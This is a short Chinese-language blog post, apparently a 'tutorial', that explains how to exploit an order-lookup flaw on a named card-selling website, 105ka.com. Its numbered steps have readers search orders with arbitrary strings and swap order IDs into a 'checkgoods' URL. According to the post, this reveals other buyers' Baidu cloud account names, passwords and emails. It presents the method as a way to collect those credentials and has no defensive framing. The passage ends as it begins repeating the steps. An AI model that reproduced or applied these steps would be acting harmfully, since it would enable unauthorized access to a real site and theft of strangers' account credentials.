利用发卡网平台漏洞撸百度云盘账号密码滴滴滴

QQ教程 2024/5/3 jimmy

3 2 1

今天小编无意间发现某发卡平台有漏洞，貌似可以直接查看订单号里的百度云账号、密码、邮箱等，好了，不多说，大家系好安全带！
教程原文：首先打开105发卡网平台地址：http://www.105ka.com/打开后点击右上角的订单查询按钮1.点击后订单查询方式换成联系方式查询
2.随便输入字母后点立即查询按钮查询，比如：qwe，qq123，Z123，123等等
3.随便点击一个订单，点击查看，查看后会跳出来要查看密码然后记住这个链接的地址：http://www.105ka.com/orderquery.htm?orderid=
4.把等于号“=”后面的一排数字记下来：然后用这串数字把原链接里的订单号替换掉！原链接：http://www.105ka.com/checkgoods.htm?orderid=订单号&_=1468577621411替换后：http://www.105ka.com/checkgoods.htm?orderid=73E5BBFFCEDA74D4&_=1468577621411替换好后直接打开这个地址就可以看到购买的记录了
5.jpg\u5361\u53f7\uff1a这一段无视，这段后面的是百度云账号和密码

小编试了一下，发现貌似可以省略后3部大家看我操作
首先打开105发卡网平台地址：http://www.105ka.com/